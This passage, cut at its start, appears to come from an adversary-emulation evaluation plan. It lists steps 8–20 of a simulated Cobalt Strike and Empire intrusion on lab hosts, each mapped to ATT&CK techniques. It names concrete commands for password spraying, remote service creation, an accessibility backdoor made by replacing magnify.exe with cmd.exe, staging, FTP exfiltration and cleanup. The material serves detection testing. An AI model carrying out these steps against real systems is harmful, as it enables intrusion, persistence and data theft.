i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discovery

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner/User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data over a network connection separate from the existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)